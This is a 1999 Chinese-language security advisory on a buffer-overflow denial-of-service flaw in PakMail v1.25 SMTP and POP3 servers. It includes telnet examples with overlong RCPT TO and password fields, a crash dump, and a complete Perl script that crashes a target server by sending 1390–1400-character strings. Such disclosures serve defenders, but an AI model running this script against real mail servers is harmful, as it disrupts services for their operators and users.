发布日期：1999-12-06
更新日期：1999-12-06

受影响系统：

PakMail v1.25 SMTP/POP3 Server

描述：

---

Rewted Network Security Labs发现PakMail SMTP and POP3中存在本地/远程拒绝服务漏洞。溢出产生的原因是在“RCPT TO:”时使用了超长的用户名。

举例:   
  
telnet localhost 25   
220 jedi PakMail Mail Server ready at Sun, 05 Dec 99   
mail from: test@localhost   
250 test@localhost Sender Ok   
rcpt to: $buffer@localhost   
  
buffer大于1390个字符时，服务将停止。   
  
错误提示如下：   
PAKMAIL caused an invalid page fault in   
module KERNEL32.DLL at 0137:bff9a5d0.   
Registers:   
EAX=c001743c CS=0137 EIP=bff9a5d0 EFLGS=00010212   
EBX=0159ffb8 SS=013f ESP=0149ff38 EBP=014a01d4   
ECX=00000000 DS=013f ESI=00000000 FS=4717   
EDX=bff7678c ES=013f EDI=bffb8e70 GS=0000   
Bytes at CS:EIP:   
53 8b 15 7c c2 fb bf 56 89 4d e4 57 89 4d dc 89   
Stack dump:   
  
同样，pop3在输入的密码为1400个字符时，产生溢出。   
举例：   
telnet localhost 110   
+OK PakMail on (jedi) at (Sun, 05 Dec 99)   
user test   
+OK   
pass $buffer   
  
程序将终止

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl   
  
################################################   
# Rewted Network Security Labs www.rewted.org #   
# #   
# Exploits a buffer overrun on PakMail #   
# SMTP and POP3 servers. #   
# Vulnerable version 1.25 and probably below. #   
# Vendor: www.pak.net #   
# #   
# Exploited by slackee warminx@null.rewted.org #   
################################################   
  
use IO::Socket;   
use Getopt::Std;   
getopts(''h:t'', \%args);   
if(!defined($args{h}) && !defined($args{t})) {   
print qq~Rewted Network Security Labs www.rewted.org\nUsage: $0 -h -t   
  
-h hostname to test bof   
-t server type to DoS (1 = SMTP)   
(2 = POP3)   
  
~; exit; }   
if(defined($args{h}) && defined($args{t})){   
if(($args{t}) == 1) { &pakmail; }   
if(($args{t}) == 2) { &pakpop; }}   
  
sub pakmail {   
$victim=$args{h};   
$denial .= "A" x 1390;   
$socket = IO::Socket::INET->new (Proto => "tcp",   
PeerAddr => $victim,   
PeerPort => "25") or die "Can''t connect.\n";   
print $socket "MAIL FROM: test\@localhost\n";   
print $socket "RCPT TO: $denial\@localhost\n";   
print "\nSent overflow to $victim\n";   
close $socket; }   
  
sub pakpop {   
$victim=$args{h};   
$denial .= "A" x 1400;   
$socket = IO::Socket::INET->new (Proto => "tcp",   
PeerAddr => $victim,   
PeerPort => "110") or die "Can''t connect.\n";   
print $socket "user test\n";   
print $socket "pass $denial\n";   
print "\nSent overflow to $victim\n";   
close $socket; }

建议：

---

暂无

浏览次数：8391
严重程度：0（网友投票）